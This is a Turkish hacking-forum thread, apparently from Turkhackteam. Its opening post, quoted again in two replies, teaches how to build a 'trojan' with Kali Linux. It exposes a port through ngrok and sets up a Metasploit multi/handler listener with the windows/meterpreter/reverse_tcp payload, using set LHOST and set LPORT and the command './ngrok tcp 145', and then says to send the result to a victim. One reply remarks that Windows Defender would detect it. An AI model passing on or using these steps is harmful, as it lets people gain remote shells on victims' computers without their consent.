Kali Linux NGROK ile trojan oluşturma ve kullanımı

4tomx

Üye
30 May 2019
102
22
Öncelikle merhaba arkadaşlar,
Bugün sizlerle başlıkta da belirttiğim gibi Kali linux kullanarak ngrok ile trojan oluşturmayı göstereceğim.

1-)İlk olarak NGROK kurulumu yapalım
NGROK'un sitesine girelim
cke9a00.png

Sonra
s6f02v3.png

İndirmek için
6rxbfcc.png

Ngrok terminalden giriş yapma
2x5umkz.png

jrjkhwr.png


2-)Payload oluşturma
Öncelikle
Kod:
./ngrok tcp 145
yazıyoruz(145 yerine istediğiniz portu yazın)
6m6mkcv.png

Portumuz açıldı
pho60sz.png

farkettiyseniz local ip adresim yerine ngrok'un bana vermiş olduğu 8.tcp.ngrok.io adresini kullanıp gene local port yerine ngrok'un bana vermiş olduğu 19348 portunu yazdım.


3-)Payload ayarlarını yapma ve dinleme işlemi
terminale msfconsole yazıp metaspolite giriyoruz ardından use exploit/multi/handler yazıp enter'a basıyoruz
e4umvh4.png

ardından payloadımızı belirtiyoruz biz payloadı windows/meterpreter/reverse_tcp olarak belirtmiştik o yüzden set payload windows/meterpreter/reverse_tcp yazıp enter'a basıyoruz.
Artık ayarları yapalım show options yazıyoruz.
d7crigp.png

LHOST ve LPORT değişkenlerini değiştirmemiz lazım ama bunu bize ngrok'un verdiği IP lerle yapmıyoruz
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
en son run yazıyoruz
2896eoe.png

Payload dinlenmeye başladı şimdi kurbana atma zamanı
bqhklzc.png

Oturum açtıktan sonra help yazarak komutları görebilirsiniz.
Eğer PC kapatıldığında payload dinleme işlemi ve oturumların kapanmasını istemiyorsanız
nrx8bnd.png

Sanal makinadan çıkarken suspend butonuna basın
İyi forumlar.
 
Son düzenleme:

trombolol33001

Katılımcı Üye
19 Kas 2021
420
142
18
Öncelikle merhaba arkadaşlar,
Bugün sizlerle başlıkta da belirttiğim gibi Kali linux kullanarak ngrok ile trojan oluşturmayı göstereceğim.

1-)İlk olarak NGROK kurulumu yapalım
NGROK'un sitesine girelim
cke9a00.png

Sonra
s6f02v3.png

İndirmek için
6rxbfcc.png

Ngrok terminalden giriş yapma
2x5umkz.png

jrjkhwr.png


2-)Payload oluşturma
Öncelikle
Kod:
./ngrok tcp 145
yazıyoruz(145 yerine istediğiniz portu yazın)
6m6mkcv.png

Portumuz açıldı
pho60sz.png

farkettiyseniz local ip adresim yerine ngrok'un bana vermiş olduğu 8.tcp.ngrok.io adresini kullanıp gene local port yerine ngrok'un bana vermiş olduğu 19348 portunu yazdım.


3-)Payload ayarlarını yapma ve dinleme işlemi
terminale msfconsole yazıp metaspolite giriyoruz ardından use exploit/multi/handler yazıp enter'a basıyoruz
e4umvh4.png

ardından payloadımızı belirtiyoruz biz payloadı windows/meterpreter/reverse_tcp olarak belirtmiştik o yüzden set payload windows/meterpreter/reverse_tcp yazıp enter'a basıyoruz.
Artık ayarları yapalım show options yazıyoruz.
d7crigp.png

LHOST ve LPORT değişkenlerini değiştirmemiz lazım ama bunu bize ngrok'un verdiği IP lerle yapmıyoruz
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
en son run yazıyoruz
2896eoe.png

Payload dinlenmeye başladı şimdi kurbana atma zamanı
bqhklzc.png

Oturum açtıktan sonra help yazarak komutları görebilirsiniz.
Eğer PC kapatıldığında payload dinleme işlemi ve oturumların kapanmasını istemiyorsanız
nrx8bnd.png

Sanal makinadan çıkarken suspend butonuna basın
İyi forumlar.
Elinize sağllık hocam.
 

ancients123

Uzman üye
9 Nis 2016
1,710
330
Öncelikle merhaba arkadaşlar,
Bugün sizlerle başlıkta da belirttiğim gibi Kali linux kullanarak ngrok ile trojan oluşturmayı göstereceğim.

1-)İlk olarak NGROK kurulumu yapalım
NGROK'un sitesine girelim
cke9a00.png

Sonra
s6f02v3.png

İndirmek için
6rxbfcc.png

Ngrok terminalden giriş yapma
2x5umkz.png

jrjkhwr.png


2-)Payload oluşturma
Öncelikle
Kod:
./ngrok tcp 145
yazıyoruz(145 yerine istediğiniz portu yazın)
6m6mkcv.png

Portumuz açıldı
pho60sz.png

farkettiyseniz local ip adresim yerine ngrok'un bana vermiş olduğu 8.tcp.ngrok.io adresini kullanıp gene local port yerine ngrok'un bana vermiş olduğu 19348 portunu yazdım.


3-)Payload ayarlarını yapma ve dinleme işlemi
terminale msfconsole yazıp metaspolite giriyoruz ardından use exploit/multi/handler yazıp enter'a basıyoruz
e4umvh4.png

ardından payloadımızı belirtiyoruz biz payloadı windows/meterpreter/reverse_tcp olarak belirtmiştik o yüzden set payload windows/meterpreter/reverse_tcp yazıp enter'a basıyoruz.
Artık ayarları yapalım show options yazıyoruz.
d7crigp.png

LHOST ve LPORT değişkenlerini değiştirmemiz lazım ama bunu bize ngrok'un verdiği IP lerle yapmıyoruz
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
en son run yazıyoruz
2896eoe.png

Payload dinlenmeye başladı şimdi kurbana atma zamanı
bqhklzc.png

Oturum açtıktan sonra help yazarak komutları görebilirsiniz.
Eğer PC kapatıldığında payload dinleme işlemi ve oturumların kapanmasını istemiyorsanız
nrx8bnd.png

Sanal makinadan çıkarken suspend butonuna basın
İyi forumlar.
Ellerine sağlık ama bu trojan maalesef kimseye atmaya deymez windows defender bile yakalar ngrok ile çalışmayı bilmeyene güzel örnek
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.